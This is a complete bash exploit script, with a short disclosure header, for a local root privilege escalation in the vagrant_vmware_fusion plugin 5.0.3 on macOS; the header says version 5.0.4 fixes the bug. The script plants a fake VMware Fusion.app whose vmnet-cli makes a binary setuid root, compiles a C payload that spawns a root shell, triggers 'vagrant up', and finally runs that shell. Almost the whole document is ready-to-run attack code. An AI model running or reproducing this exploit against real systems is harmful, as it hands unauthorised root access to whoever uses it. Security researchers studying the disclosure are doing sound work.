# Another day, another root privesc bug in this plugin. Not quite so serious this
# time - this one is only exploitable if the user has the plugin installed but
# VMware Fusion *not* installed. This is a fairly unlikely scenario but it's a
# straight to root privesc with no user interaction so isn't the kind of thing
# that should be shipping with any software.
# This occurs because the suid root sudo helper that I have discussed in previous
# exploit writeups executes /Applications/VMware
# Fusion.app/Contents/Library/vmnet-cli
# as root, but if the application isn't installed and we're a local admin user we
# can create a fake app directory with a payload in place of vmnet-cli that gets
# executed as root.
# HashiCorp fixed this (very quickly) in 5.0.4.
# https://m4.rkw.io/vagrant_vmware_privesc_5.0.3.sh.txt
# 3c11083386b3f7352d60b327190eed4364383c0622351db5410d809f4bda746a
# ------------------------------------------------------------------------------
#!/bin/bash
echo
echo "#########################################################"
echo "# vagrant_vmware_fusion plugin 5.0.3 local root privesc #"
echo "# by m4rkw - https://m4.rkw.io/blog.html #";
echo "#########################################################"
echo "# Note: only works when VMWare Fusion is not installed. #"
echo "#########################################################"
echo
cleanup() {
exec 2> /dev/null
killall -9 vagrant 1>/dev/null 2>/dev/null
kill -9 `ps auxwww |egrep '\/vagrant up$' |xargs -L1 |cut -d ' ' -f2` &>/dev/null
exec 2> /dev/tty
cd
rm -rf .vagrant_vmware_fusion_503_exp
rm -rf /Applications/VMware\ Fusion.app
}
if [ -e "/Applications/VMware Fusion.app" ] ; then
echo "Fusion is installed, not exploitable."
exit 1
fi
echo "setting up fake app directory..."
mkdir /Applications/VMware\ Fusion.app
if [ ! $? -eq 0 ] ; then
echo "Failed to create /Applications/VMware Fusion.app."
exit 1
fi
mkdir -p /Applications/VMware\ Fusion.app/Contents/Library/services
touch /Applications/VMware\ Fusion.app/Contents/Library/vmrun
touch /Applications/VMware\ Fusion.app/Contents/Library/services/Open\ VMware\ Fusion\ Services
chmod 755 /Applications/VMware\ Fusion.app/Contents/Library/vmrun
chmod 755 /Applications/VMware\ Fusion.app/Contents/Library/services/Open\ VMware\ Fusion\ Services
cat > /Applications/VMware\ Fusion.app/Contents/Library/vmware-vmx <<EOF
#!/bin/bash
echo 1>&2
echo "VMware Fusion Information:" 1>&2
echo "VMware Fusion 10.0.1 build-6754183 Release" 1>&2
echo
EOF
chmod 755 /Applications/VMware\ Fusion.app/Contents/Library/vmware-vmx
cat > /Applications/VMware\ Fusion.app/Contents/Library/vmnet-cli <<EOF
#!/bin/bash
chown root:wheel /tmp/vvp_503
chmod 4755 /tmp/vvp_503
EOF
chmod 755 /Applications/VMware\ Fusion.app/Contents/Library/vmnet-cli
echo "compiling payload..."
cat > /tmp/vvp_503.c <<EOF
#include <unistd.h>
int main()
{
setuid(0);
seteuid(0);
execl("/bin/bash","bash","-c","rm -f /tmp/vvp_503; /bin/bash",NULL);
return 0;
}
EOF
gcc -o /tmp/vvp_503 /tmp/vvp_503.c
rm -f /tmp/vvp_503.c
cd
mkdir .vagrant_vmware_fusion_503_exp
cd .vagrant_vmware_fusion_503_exp
echo "writing dummy vagrantfile ..."
cat > vagrantfile <<EOF
Vagrant.configure('2') do |config|
config.vm.box = 'envimation/ubuntu-xenial'
end
EOF
echo "triggering vagrant up [stage 1]..."
vagrant up &>/dev/null &
while :
do
r=`ps auxwww |grep 'vagrant up' |grep -v grep`
if [ "$r" == "" ] ; then
break
fi
sleep 0.5
done
echo "dropping dummy machine..."
uuid=`ls -1 .vagrant/machines/default/vmware_fusion |grep -v vagrant_cwd`
touch .vagrant/machines/default/vmware_fusion/$uuid/ubuntu-xenial-vmware-fusion.vmx
echo -n "`pwd`/.vagrant/machines/default/vmware_fusion/$uuid/ubuntu-xenial-vmware-fusion.vmx" > .vagrant/machines/default/vmware_fusion/id
echo "triggering vagrant up [stage 2]..."
vagrant up &>/dev/null &
echo "waiting for payload to trigger ..."
count=0
success=0
while :
do
r=`ls -la /tmp/vvp_503 |grep -- '-rwsr-xr-x 1 root wheel'`
if [ "$r" != "" ] ; then
success=1
break
fi
r=`ps auxwww |grep 'vagrant up' |grep -v grep`
if [ "$r" == "" ] ; then
break
fi
sleep 0.2
count=$(($count + 1))
if [ $count -eq 250 ] ; then
echo "Timed out waiting for the payload to trigger."
cleanup
exit 1
fi
done
cleanup
if [ ! $success -eq 1 ] ; then
echo "exploit failed."
exit 1
fi
echo
cd
/tmp/vvp_503